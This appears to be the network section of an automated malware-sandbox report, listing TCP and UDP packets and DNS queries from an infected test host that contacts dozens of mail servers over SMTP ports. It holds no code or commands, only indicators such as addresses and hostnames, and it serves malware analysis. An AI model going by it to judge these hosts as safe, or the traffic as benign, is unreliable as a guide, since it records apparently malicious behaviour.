Okt 17, 2017 21:55:36.131302118 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:55:36.131572008 MESZ49222465192.168.1.16193.110.129.149
Okt 17, 2017 21:55:36.131639004 MESZ46549222193.110.129.149192.168.1.16
Okt 17, 2017 21:55:36.132256031 MESZ49222465192.168.1.16193.110.129.149
Okt 17, 2017 21:55:36.173012972 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.173233032 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:36.173259020 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.173693895 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:36.173712015 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.596611977 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.597124100 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:36.597166061 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.597393990 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:36.597419024 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.598386049 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:36.598407030 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.598614931 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:36.598637104 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.972028017 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.972299099 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:36.972322941 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:36.972424984 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:36.972445965 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:37.435980082 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:37.436171055 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:37.436193943 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:37.437324047 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:37.437335968 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:37.832001925 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:37.832602024 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:37.832629919 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:37.833106041 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:37.833127975 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:38.263649940 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:38.264159918 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:38.264202118 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:38.264378071 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:38.264403105 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:38.265428066 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:38.265455008 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:38.265667915 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:38.265692949 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:38.664525032 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:38.664845943 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:38.664876938 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:38.665222883 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:38.665242910 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.100420952 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.100661039 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:39.100682020 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.101123095 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:39.101140022 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.427913904 MESZ49240587192.168.1.1664.29.151.235
Okt 17, 2017 21:55:39.428047895 MESZ5874924064.29.151.235192.168.1.16
Okt 17, 2017 21:55:39.428494930 MESZ49240587192.168.1.1664.29.151.235
Okt 17, 2017 21:55:39.505176067 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.505700111 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:39.505724907 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.506180048 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:39.506196976 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.912623882 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.913130045 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:39.913170099 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.913341999 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:39.913367033 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.914318085 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:39.914341927 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:39.914555073 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:39.914578915 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:40.620217085 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:40.620691061 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:40.620734930 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:40.621238947 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:40.621356010 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:55:40.624562025 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:55:40.625760078 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:40.626682997 MESZ49266443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:40.626712084 MESZ4434926693.180.157.92192.168.1.16
Okt 17, 2017 21:55:40.627064943 MESZ49266443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:40.627486944 MESZ49266443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:40.627504110 MESZ4434926693.180.157.92192.168.1.16
Okt 17, 2017 21:55:40.927851915 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:41.273890018 MESZ4434926693.180.157.92192.168.1.16
Okt 17, 2017 21:55:41.274005890 MESZ49266443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:41.522164106 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:42.725331068 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:44.272910118 MESZ4434926693.180.157.92192.168.1.16
Okt 17, 2017 21:55:44.273060083 MESZ49266443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:45.162766933 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:49.974798918 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:55:51.946913958 MESZ49268587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:51.946949005 MESZ5874926840.101.48.82192.168.1.16
Okt 17, 2017 21:55:51.947019100 MESZ49268587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:51.966428041 MESZ49269587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:51.966458082 MESZ5874926940.101.48.82192.168.1.16
Okt 17, 2017 21:55:51.968507051 MESZ49269587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:51.970958948 MESZ49270587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:51.970987082 MESZ5874927040.101.48.82192.168.1.16
Okt 17, 2017 21:55:51.971067905 MESZ49270587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:51.971630096 MESZ49271587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:51.971654892 MESZ5874927140.101.48.82192.168.1.16
Okt 17, 2017 21:55:51.972100973 MESZ49272465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.972125053 MESZ4654927274.125.205.108192.168.1.16
Okt 17, 2017 21:55:51.972201109 MESZ49271587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:51.972230911 MESZ49272465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.972511053 MESZ49272465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.972528934 MESZ4654927274.125.205.108192.168.1.16
Okt 17, 2017 21:55:51.973001003 MESZ49273465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.973025084 MESZ4654927374.125.205.108192.168.1.16
Okt 17, 2017 21:55:51.973480940 MESZ49274465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.973504066 MESZ4654927474.125.205.108192.168.1.16
Okt 17, 2017 21:55:51.973577023 MESZ49273465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.973937988 MESZ49273465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.973954916 MESZ4654927374.125.205.108192.168.1.16
Okt 17, 2017 21:55:51.974016905 MESZ49274465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.974271059 MESZ49274465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.974287033 MESZ4654927474.125.205.108192.168.1.16
Okt 17, 2017 21:55:51.976083994 MESZ49275465192.168.1.16173.201.192.101
Okt 17, 2017 21:55:51.976110935 MESZ46549275173.201.192.101192.168.1.16
Okt 17, 2017 21:55:51.976193905 MESZ49275465192.168.1.16173.201.192.101
Okt 17, 2017 21:55:51.976448059 MESZ49275465192.168.1.16173.201.192.101
Okt 17, 2017 21:55:51.976465940 MESZ46549275173.201.192.101192.168.1.16
Okt 17, 2017 21:55:51.976958036 MESZ49276465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.976983070 MESZ4654927674.125.205.108192.168.1.16
Okt 17, 2017 21:55:51.977319002 MESZ49276465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.977499962 MESZ49276465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:51.977516890 MESZ4654927674.125.205.108192.168.1.16
Okt 17, 2017 21:55:52.059613943 MESZ49277465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:52.059643984 MESZ4654927774.125.205.108192.168.1.16
Okt 17, 2017 21:55:52.060138941 MESZ49277465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:52.060276985 MESZ49277465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:52.060293913 MESZ4654927774.125.205.108192.168.1.16
Okt 17, 2017 21:55:52.145678043 MESZ49280465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:52.145706892 MESZ4654928074.125.205.108192.168.1.16
Okt 17, 2017 21:55:52.146919966 MESZ49280465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:52.147090912 MESZ49280465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:52.147110939 MESZ4654928074.125.205.108192.168.1.16
Okt 17, 2017 21:55:52.204737902 MESZ5874926840.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.205049038 MESZ49281465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:52.205077887 MESZ4654928174.125.205.108192.168.1.16
Okt 17, 2017 21:55:52.205239058 MESZ49268587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:52.205255985 MESZ5874926840.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.207346916 MESZ49281465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:52.207385063 MESZ49268587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:52.207412958 MESZ5874926840.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.207531929 MESZ49281465192.168.1.1674.125.205.108
Okt 17, 2017 21:55:52.207547903 MESZ4654928174.125.205.108192.168.1.16
Okt 17, 2017 21:55:52.279372931 MESZ5874927040.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.279401064 MESZ5874926940.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.279411077 MESZ5874927140.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.279660940 MESZ49270587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:52.279679060 MESZ5874927040.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.279836893 MESZ49269587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:52.279851913 MESZ5874926940.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.279959917 MESZ49270587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:52.279974937 MESZ5874927040.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.280024052 MESZ49269587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:52.280034065 MESZ5874926940.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.280185938 MESZ49271587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:52.280200958 MESZ5874927140.101.48.82192.168.1.16
Okt 17, 2017 21:55:52.280366898 MESZ49271587192.168.1.1640.101.48.82
Okt 17, 2017 21:55:52.280380011 MESZ5874927140.101.48.82192.168.1.16

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Okt 17, 2017 21:53:38.028403997 MESZ5697553192.168.1.168.8.8.8
Okt 17, 2017 21:53:38.456110001 MESZ53569758.8.8.8192.168.1.16
Okt 17, 2017 21:53:57.750511885 MESZ5120853192.168.1.168.8.8.8
Okt 17, 2017 21:53:58.197060108 MESZ53512088.8.8.8192.168.1.16
Okt 17, 2017 21:54:30.635329008 MESZ6222853192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.638056993 MESZ5865953192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.640687943 MESZ5691753192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.643332005 MESZ6497053192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.646125078 MESZ5461853192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.649480104 MESZ6239653192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.651622057 MESZ6363853192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.653806925 MESZ5287753192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.656399012 MESZ5936253192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.696336985 MESZ5226153192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.698977947 MESZ6158553192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.701596022 MESZ5413753192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.704520941 MESZ5216553192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.707951069 MESZ5281453192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.710912943 MESZ5859853192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.713464022 MESZ6309953192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.931807041 MESZ53622288.8.8.8192.168.1.16
Okt 17, 2017 21:54:30.967278957 MESZ53569178.8.8.8192.168.1.16
Okt 17, 2017 21:54:30.976207972 MESZ53522618.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.003207922 MESZ53615858.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.012145996 MESZ53541378.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.025614977 MESZ53521658.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.178567886 MESZ53528148.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.193166018 MESZ53585988.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307306051 MESZ53593628.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307351112 MESZ53528778.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307377100 MESZ53636388.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307403088 MESZ53623968.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307426929 MESZ53546188.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307451963 MESZ53649708.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307482004 MESZ53586598.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.423110008 MESZ53630998.8.8.8192.168.1.16
Okt 17, 2017 21:54:32.722162008 MESZ5619053192.168.1.168.8.8.8
Okt 17, 2017 21:54:32.729919910 MESZ6140753192.168.1.168.8.8.8
Okt 17, 2017 21:54:32.811738968 MESZ5809853192.168.1.168.8.8.8
Okt 17, 2017 21:54:32.815433979 MESZ6312953192.168.1.168.8.8.8
Okt 17, 2017 21:54:32.818008900 MESZ5128353192.168.1.168.8.8.8
Okt 17, 2017 21:54:32.843300104 MESZ6534853192.168.1.168.8.8.8
Okt 17, 2017 21:54:33.108905077 MESZ53561908.8.8.8192.168.1.16
Okt 17, 2017 21:54:33.202631950 MESZ53580988.8.8.8192.168.1.16
Okt 17, 2017 21:54:33.209966898 MESZ53614078.8.8.8192.168.1.16
Okt 17, 2017 21:54:33.258923054 MESZ53631298.8.8.8192.168.1.16
Okt 17, 2017 21:54:33.277282953 MESZ53512838.8.8.8192.168.1.16
Okt 17, 2017 21:54:33.304066896 MESZ53653488.8.8.8192.168.1.16
Okt 17, 2017 21:54:33.649516106 MESZ6440553192.168.1.168.8.8.8
Okt 17, 2017 21:54:33.884783030 MESZ53644058.8.8.8192.168.1.16
Okt 17, 2017 21:54:33.929403067 MESZ5221653192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.196103096 MESZ5062153192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.292162895 MESZ53522168.8.8.8192.168.1.16
Okt 17, 2017 21:54:34.556976080 MESZ5463953192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.587651968 MESZ53506218.8.8.8192.168.1.16
Okt 17, 2017 21:54:34.604156017 MESZ6054353192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.793196917 MESZ5194553192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.855987072 MESZ5204653192.168.1.168.8.8.8
Okt 17, 2017 21:54:34.866101027 MESZ53546398.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.052781105 MESZ53605438.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.178107977 MESZ53519458.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.289917946 MESZ6295153192.168.1.168.8.8.8
Okt 17, 2017 21:54:35.342417002 MESZ53520468.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.494941950 MESZ4937953192.168.1.168.8.8.8
Okt 17, 2017 21:54:35.615745068 MESZ53629518.8.8.8192.168.1.16
Okt 17, 2017 21:54:35.777390957 MESZ5500653192.168.1.168.8.8.8
Okt 17, 2017 21:54:35.887656927 MESZ53493798.8.8.8192.168.1.16
Okt 17, 2017 21:54:36.102555990 MESZ53550068.8.8.8192.168.1.16
Okt 17, 2017 21:54:36.915501118 MESZ5978453192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.163999081 MESZ5938653192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.280257940 MESZ53597848.8.8.8192.168.1.16
Okt 17, 2017 21:54:37.339257956 MESZ6023053192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.343180895 MESZ5227253192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.522598982 MESZ5498153192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.607722998 MESZ53593868.8.8.8192.168.1.16
Okt 17, 2017 21:54:37.754550934 MESZ4931153192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.789937973 MESZ53602308.8.8.8192.168.1.16
Okt 17, 2017 21:54:37.860558987 MESZ5508153192.168.1.168.8.8.8
Okt 17, 2017 21:54:37.932879925 MESZ5267853192.168.1.168.8.8.8
Okt 17, 2017 21:54:38.001272917 MESZ53522728.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.081823111 MESZ6068853192.168.1.168.8.8.8
Okt 17, 2017 21:54:38.097083092 MESZ53549818.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.188313007 MESZ53493118.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.297322989 MESZ6262353192.168.1.168.8.8.8
Okt 17, 2017 21:54:38.316471100 MESZ53550818.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.476599932 MESZ53606888.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.607454062 MESZ53526788.8.8.8192.168.1.16
Okt 17, 2017 21:54:38.924998999 MESZ53626238.8.8.8192.168.1.16
Okt 17, 2017 21:54:39.107225895 MESZ6193053192.168.1.168.8.8.8
Okt 17, 2017 21:54:39.422228098 MESZ53619308.8.8.8192.168.1.16
Okt 17, 2017 21:54:39.618007898 MESZ6049953192.168.1.168.8.8.8
Okt 17, 2017 21:54:39.620553017 MESZ5512553192.168.1.168.8.8.8
Okt 17, 2017 21:54:39.666569948 MESZ5670953192.168.1.168.8.8.8
Okt 17, 2017 21:54:39.933840036 MESZ53604998.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.052686930 MESZ53551258.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.071121931 MESZ5215853192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.145055056 MESZ53567098.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.322349072 MESZ5555753192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.430604935 MESZ53521588.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.512640953 MESZ5431453192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.515192986 MESZ5917753192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.555732965 MESZ53555578.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.559281111 MESZ5337953192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.693851948 MESZ4942053192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.697457075 MESZ5406153192.168.1.168.8.8.8
Okt 17, 2017 21:54:40.849541903 MESZ53543148.8.8.8192.168.1.16
Okt 17, 2017 21:54:40.999649048 MESZ53533798.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.099785089 MESZ53591778.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.108417988 MESZ5191953192.168.1.168.8.8.8
Okt 17, 2017 21:54:41.189830065 MESZ53540618.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.199172020 MESZ53494208.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.338852882 MESZ53519198.8.8.8192.168.1.16
Okt 17, 2017 21:54:41.357425928 MESZ5456353192.168.1.168.8.8.8
Okt 17, 2017 21:54:41.457832098 MESZ6301053192.168.1.168.8.8.8
Okt 17, 2017 21:54:41.710196018 MESZ53545638.8.8.8192.168.1.16
Okt 17, 2017 21:54:42.011389971 MESZ53630108.8.8.8192.168.1.16
Okt 17, 2017 21:54:42.521584988 MESZ5361853192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.682028055 MESZ6372853192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.775572062 MESZ6084253192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.783135891 MESZ53536188.8.8.8192.168.1.16
Okt 17, 2017 21:54:42.908085108 MESZ5599953192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.913744926 MESZ5469553192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.918979883 MESZ53637288.8.8.8192.168.1.16
Okt 17, 2017 21:54:42.944986105 MESZ5023753192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.949193001 MESZ6518053192.168.1.168.8.8.8
Okt 17, 2017 21:54:43.051275969 MESZ53608428.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.093003988 MESZ5741453192.168.1.168.8.8.8
Okt 17, 2017 21:54:43.195643902 MESZ53559998.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.387650013 MESZ53546958.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.421097040 MESZ53651808.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.484106064 MESZ53502378.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.597601891 MESZ53574148.8.8.8192.168.1.16

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Okt 17, 2017 21:53:38.028403997 MESZ192.168.1.168.8.8.80x78c2Standard query (0)austinfilmschool.orgA (IP address)IN (0x0001)
Okt 17, 2017 21:53:57.750511885 MESZ192.168.1.168.8.8.80x323bStandard query (0)zlc-aa.orgA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.635329008 MESZ192.168.1.168.8.8.80x2accStandard query (0)e24.ehosts.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.638056993 MESZ192.168.1.168.8.8.80x1546Standard query (0)smtp.live.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.640687943 MESZ192.168.1.168.8.8.80x32d1Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.643332005 MESZ192.168.1.168.8.8.80x826eStandard query (0)smtp.live.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.646125078 MESZ192.168.1.168.8.8.80x461aStandard query (0)smtp.live.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.649480104 MESZ192.168.1.168.8.8.80xbe50Standard query (0)smtp.live.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.651622057 MESZ192.168.1.168.8.8.80x272cStandard query (0)smtp.live.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.653806925 MESZ192.168.1.168.8.8.80x9f18Standard query (0)smtp.live.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.656399012 MESZ192.168.1.168.8.8.80x90ecStandard query (0)smtp.live.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.696336985 MESZ192.168.1.168.8.8.80xd275Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.698977947 MESZ192.168.1.168.8.8.80x3cecStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.701596022 MESZ192.168.1.168.8.8.80x1af6Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.704520941 MESZ192.168.1.168.8.8.80x7ee6Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.707951069 MESZ192.168.1.168.8.8.80x3a20Standard query (0)smtpout.secureserver.netA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.710912943 MESZ192.168.1.168.8.8.80xb403Standard query (0)smtp.gmail.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:30.713464022 MESZ192.168.1.168.8.8.80x1ac8Standard query (0)pop.loomes.netA (IP address)IN (0x0001)
Okt 17, 2017 21:54:32.722162008 MESZ192.168.1.168.8.8.80xcec9Standard query (0)smtp.outlook.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:32.729919910 MESZ192.168.1.168.8.8.80xdd2Standard query (0)ssl0.ovh.netA (IP address)IN (0x0001)
Okt 17, 2017 21:54:32.811738968 MESZ192.168.1.168.8.8.80x7944Standard query (0)smtp.wp.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:32.815433979 MESZ192.168.1.168.8.8.80xbffaStandard query (0)mail.active24.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:32.818008900 MESZ192.168.1.168.8.8.80x5ffStandard query (0)smtp.poczta.onet.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:32.843300104 MESZ192.168.1.168.8.8.80x17a4Standard query (0)smtp.wp.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:33.649516106 MESZ192.168.1.168.8.8.80x4ae2Standard query (0)smtp.wp.plA (IP address)IN (0x0001)
Okt 17, 2017 21:54:33.929403067 MESZ192.168.1.168.8.8.80xc3ecStandard query (0)virtual1.mx.freenet.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:34.196103096 MESZ192.168.1.168.8.8.80xe5c4Standard query (0)virtual0.mx.freenet.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:34.556976080 MESZ192.168.1.168.8.8.80x75f9Standard query (0)smtp.t-2.netA (IP address)IN (0x0001)
Okt 17, 2017 21:54:34.604156017 MESZ192.168.1.168.8.8.80xc2fbStandard query (0)service3.xmobile-services.atA (IP address)IN (0x0001)
Okt 17, 2017 21:54:34.793196917 MESZ192.168.1.168.8.8.80x8a78Standard query (0)dug-service.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:34.855987072 MESZ192.168.1.168.8.8.80x6f44Standard query (0)mail.mediaserve.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:35.289917946 MESZ192.168.1.168.8.8.80xd674Standard query (0)zobelei.deA (IP address)IN (0x0001)
Okt 17, 2017 21:54:35.494941950 MESZ192.168.1.168.8.8.80xed75Standard query (0)mail.zered.atA (IP address)IN (0x0001)
Okt 17, 2017 21:54:35.777390957 MESZ192.168.1.168.8.8.80x4bb7Standard query (0)send.one.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:36.915501118 MESZ192.168.1.168.8.8.80x7d6eStandard query (0)smtp.tele2.atA (IP address)IN (0x0001)
Okt 17, 2017 21:54:37.163999081 MESZ192.168.1.168.8.8.80xf6a9Standard query (0)w00b4087.kasserver.comA (IP address)IN (0x0001)
Okt 17, 2017 21:54:37.339257956 MESZ192.168.1.168.8.8.80x43a4Standard query (0)ns0.ovh.netA (IP address)IN (0x0001)
